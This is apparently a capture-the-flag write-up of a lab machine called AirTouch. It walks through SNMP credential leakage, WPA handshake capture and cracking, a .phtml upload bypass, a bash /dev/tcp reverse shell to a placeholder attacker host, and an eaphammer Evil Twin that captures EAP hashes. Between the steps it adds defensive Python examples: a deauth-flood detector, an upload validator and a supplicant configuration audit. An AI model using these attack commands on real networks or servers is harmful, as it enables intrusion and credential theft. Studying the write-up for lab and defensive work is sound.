Overview
AirTouch is a hard machine focused on enterprise WiFi security. The attack chain involves SNMP enumeration, WPA handshake capture, web exploitation, and an Evil Twin WPA-EAP attack.
SNMP Enumeration
The SNMP service was exposed with the default public community string, and credentials were readable through it.
nmap -sU -p161 10.129.X.X
consultant : RxBlZhLmOkacNWScmZ6D
Initial Access (SSH)
ssh consultant@10.129.X.X
Access to the system was obtained; wireless auditing tools were already installed on it.
WPA Handshake Capture
airmon-ng start wlan2
airodump-ng wlan2mon
aireplay-ng --deauth 10
The WPA handshake was captured successfully.
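The deauthentication step above is noisy: the access point's clients are forced off the network by a burst of unauthenticated management frames, which is exactly what a wireless IDS looks for (and what 802.11w / Protected Management Frames prevents). The following detector is an added example, not part of the original writeup; the log format it parses (one management frame per line, `<unix_ts> <src_mac> <dst_mac> <subtype>`, as a sensor or a tshark field export might produce) and the sample frames are constructed for the example.

```python
"""Flag deauth/disassoc floods in a constructed 802.11 management-frame log.

Added example; the log format and the sample lines are assumptions, not
output from any tool used in the writeup.
"""
from collections import defaultdict, deque

# Constructed sample: ten deauth frames from one BSSID to broadcast within a
# second (a flood), interleaved with beacons, plus one isolated deauth from a
# second BSSID (a normal client roam, not a flood).
SAMPLE_LOG = """\
1700000000.00 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff beacon
1700000000.10 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.20 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.30 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.40 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.50 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff beacon
1700000000.50 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.60 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.70 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.80 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000000.90 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000001.00 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff deauth
1700000001.50 aa:bb:cc:dd:ee:01 ff:ff:ff:ff:ff:ff beacon
1700000003.00 aa:bb:cc:dd:ee:02 11:22:33:44:55:66 deauth
"""

WINDOW_SECONDS = 2.0   # sliding window length
THRESHOLD = 5          # deauth/disassoc frames per source within the window


def parse_line(line):
    """Split one log line into (timestamp, src, dst, subtype)."""
    ts, src, dst, subtype = line.split()
    return float(ts), src.lower(), dst.lower(), subtype.lower()


def detect_deauth_floods(log_text, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return one (src_mac, window_start_ts, count) alert per flooding source.

    Only deauth and disassoc frames are counted; beacons and data frames are
    ignored. A source is reported once, when it first crosses the threshold.
    """
    recent = defaultdict(deque)   # src -> timestamps inside the window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, _dst, subtype = parse_line(line)
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, q[0], len(q)))
    return alerts


if __name__ == "__main__":
    for src, start, count in detect_deauth_floods(SAMPLE_LOG):
        print(f"deauth flood from {src}: {count} frames starting at {start:.2f}")
```

The single deauth from the second BSSID never reaches the threshold, so only the flooding source is reported; tune `WINDOW_SECONDS` and `THRESHOLD` to the roaming behaviour of the environment being monitored.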
Cracking WPA Key
aircrack-ng -w rockyou.txt capture.cap
KEY FOUND → challenge
Web Exploitation
Privilege escalation within the web application was achieved via cookie manipulation.
Upload Bypass
curl -F "file=@shell.php;filename=shell.phtml"
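The bypass works because the upload filter only blocks the literal `.php` suffix while the web server still hands `.phtml` (and `.phar`) to the PHP interpreter; the stock Apache PHP module configuration on Debian and Ubuntu matches all three. The contrast below is an added example, not code from the target application: a blocklist check of the kind the bypass defeats beside a hardened check that allowlists image extensions, rejects any executable suffix anywhere in the name (so `shell.php.png` also fails), verifies the content's magic bytes, and stores the file under a random server-chosen name. The extension sets and the sample inputs are assumptions for the example.

```python
"""Weak vs hardened upload validation (added example, not the target's code)."""
import os
import secrets

# Assumed policy for the example: PHP-family suffixes that must never be
# stored under a name the web server could execute, and the image types accepted.
DANGEROUS_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar", "phps"}
ALLOWED_IMAGE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def weak_upload_check(filename):
    """The kind of filter the writeup's bypass defeats: blocklist on one suffix."""
    return not filename.lower().endswith(".php")


def sniff_image_type(data):
    """Return the image type implied by the leading magic bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def hardened_upload_check(filename, data):
    """Return (accepted, stored_name_or_reason) for an uploaded file.

    The stored name is generated server-side, so the client-supplied name is
    never used on disk and never influences how the web server handles the file.
    """
    name = os.path.basename(filename)          # drop any path components
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    suffixes = parts[1:]
    if any(s in DANGEROUS_EXTENSIONS for s in suffixes):
        return False, "executable extension in name"
    ext = suffixes[-1]
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return False, "extension not in allowlist"
    ext = "jpg" if ext == "jpeg" else ext
    kind = sniff_image_type(data)
    if kind is None:
        return False, "content is not a recognised image"
    if kind != ext:
        return False, "extension does not match content"
    stored_name = secrets.token_hex(16) + "." + ext
    return True, stored_name


if __name__ == "__main__":
    php_payload = b"<?php echo 'constructed sample'; ?>"   # constructed content
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8          # constructed content
    print("weak accepts shell.phtml:", weak_upload_check("shell.phtml"))
    print("hardened shell.phtml:", hardened_upload_check("shell.phtml", php_payload))
    print("hardened photo.png:", hardened_upload_check("photo.png", png_header))
```

The hardened check should run alongside server-side rules that keep the upload directory outside the interpreter's handler scope (for Apache, no `AddHandler`/`AddType` for PHP on that directory and `.htaccess` overrides disabled), since a validator alone cannot fix a misconfigured server.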
Reverse Shell
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
uid=33(www-data)
Privilege Escalation
user : JunDRDZKHDnpkpDDvay
User Flag: 07b869416a1dfc1cda7b83eb96ea8567
Root - Evil Twin Attack
eaphammer --creds -i wlan3 -e "AirTouch-Office"
hashcat -m 5500 hash rockyou.txt
password → laboratory
Root Flag: 10bf0a886515c3679fd791b9aa4d015c
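The Evil Twin only yields a crackable MSCHAPv2 hash because the victim supplicant accepts whatever RADIUS server certificate the rogue AP presents. The defence is on the client side: pin the issuing CA with `ca_cert` and the server name with `domain_suffix_match` (or `domain_match` / `altsubject_match`) in every WPA-EAP network block. The audit script below is an added example, not a tool from the writeup; it parses `wpa_supplicant.conf`-style network blocks and reports EAP networks missing either setting. The sample configuration is constructed, and the CA path and RADIUS hostname in it are placeholders.

```python
"""Audit wpa_supplicant network blocks for Evil-Twin-prone WPA-EAP settings.

Added example; the sample config below is constructed and its file paths and
hostnames are placeholders.
"""
import re

# Constructed sample: the first block trusts any server certificate, the
# second pins the CA and the RADIUS server name, the third is a PSK network.
SAMPLE_CONFIG = """\
ctrl_interface=/run/wpa_supplicant

network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user"
    password="REDACTED"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user"
    password="REDACTED"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"        # placeholder path
    domain_suffix_match="radius.example.internal"      # placeholder host
    phase2="auth=MSCHAPV2"
}

network={
    ssid="HomeNet"
    key_mgmt=WPA-PSK
    psk="REDACTED"
}
"""

NETWORK_BLOCK = re.compile(r"network\s*=\s*\{(.*?)\}", re.S)
SERVER_NAME_KEYS = ("domain_suffix_match", "domain_match", "altsubject_match")


def parse_networks(config_text):
    """Return a list of dicts, one per network={...} block (no nesting assumed)."""
    networks = []
    for body in NETWORK_BLOCK.findall(config_text):
        fields = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()      # drop trailing comments
            if "=" not in line:
                continue
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip().strip('"')
        networks.append(fields)
    return networks


def audit_eap_networks(config_text):
    """Return [(ssid, [problem, ...]), ...] for WPA-EAP networks that would
    accept a rogue access point's RADIUS certificate."""
    findings = []
    for net in parse_networks(config_text):
        if "WPA-EAP" not in net.get("key_mgmt", ""):
            continue
        problems = []
        if not net.get("ca_cert"):
            problems.append("no ca_cert: any server certificate is accepted")
        if not any(net.get(k) for k in SERVER_NAME_KEYS):
            problems.append("no server-name match: any cert from the CA is accepted")
        if problems:
            findings.append((net.get("ssid", "<no ssid>"), problems))
    return findings


if __name__ == "__main__":
    for ssid, problems in audit_eap_networks(SAMPLE_CONFIG):
        print(f"{ssid}:")
        for p in problems:
            print(f"  - {p}")
```

On managed fleets the same two settings are what an MDM or NetworkManager profile should enforce; a supplicant that prompts the user to accept an unknown certificate is still vulnerable to the attack shown above.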
Summary
- SNMP → Credentials leak
- WPA → Handshake cracked
- Web → Upload bypass
- Router → Hardcoded creds
- Evil Twin → Credential capture